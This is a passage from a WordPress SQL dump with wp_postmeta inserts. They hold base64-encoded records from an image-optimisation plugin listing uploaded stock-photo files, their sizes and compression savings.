Vyc3RvY2tfMjkxMTA2MDU1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjM1OTQsInRpbWUiOjE0ODM1ODQyMTksImlkIjo3MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjQsInRpbWUiOjE0ODM1ODQyMjIsImlkIjo3MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MDIsInRpbWUiOjE0ODM1ODQyMjUsImlkIjo3MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODEsInRpbWUiOjE0ODM1ODQyMjksImlkIjo3MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTcyLCJ0aW1lIjoxNDgzNTg0MjMzLCJpZCI6NzAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NDEsInRpbWUiOjE0ODM1ODQyMzYsImlkIjo3MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ2MSwidGltZSI6MTQ4MzU4NDIzOSwiaWQiOjcwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTcyLCJ0aW1lIjoxNDgzNTg0MjQzLCJpZCI6NzAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzAsInRpbWUiOjE0ODM1ODQyNDcsImlkIjo3MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjc1MSwidGltZSI6MTQ4MzU4NDI1MCwiaWQiOjcwMn1d'); 
INSERT INTO `wp_postmeta` VALUES (30081, 701, 'wpfc_optimisation_reduction', '2231547'); 
INSERT INTO `wp_postmeta` VALUES (30082, 701, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAuanBnIiwid2lkdGgiOjM4ODgsImhlaWdodCI6MjU5MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAuanBnIiwicmVkdWN0aW9uIjoyMjMxNTM0LCJ0aW1lIjoxNDgzNTg0MjYxLCJpZCI6IjcwMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0MjY0LCJpZCI6NzAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NDI2NywiaWQiOjcwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQyNzAsImlkIjo3MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQyNzQsImlkIjo3MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjc2LCJpZCI6NzAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NDI3OSwiaWQiOjcwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQyODEsImlkIjo3MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjg0LCJpZCI6NzAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjg3LCJpZCI6NzAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjg5LCJpZCI6NzAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0MjkyLCJpZCI6NzAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjk0LCJpZCI6NzAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzNjk0MjE0MC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzY5NDIxNDAtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjM2OTQyMTQwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mjk3LCJpZCI6NzAxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30083, 700, 'wpfc_optimisation_reduction', '11740'); 
INSERT INTO `wp_postmeta` VALUES (30084, 700, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUuanBnIiwid2lkdGgiOjU0NzIsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDMwMiwiaWQiOiI3MDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6Njc2LCJ0aW1lIjoxNDgzNTg0MzA1LCJpZCI6NzAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaH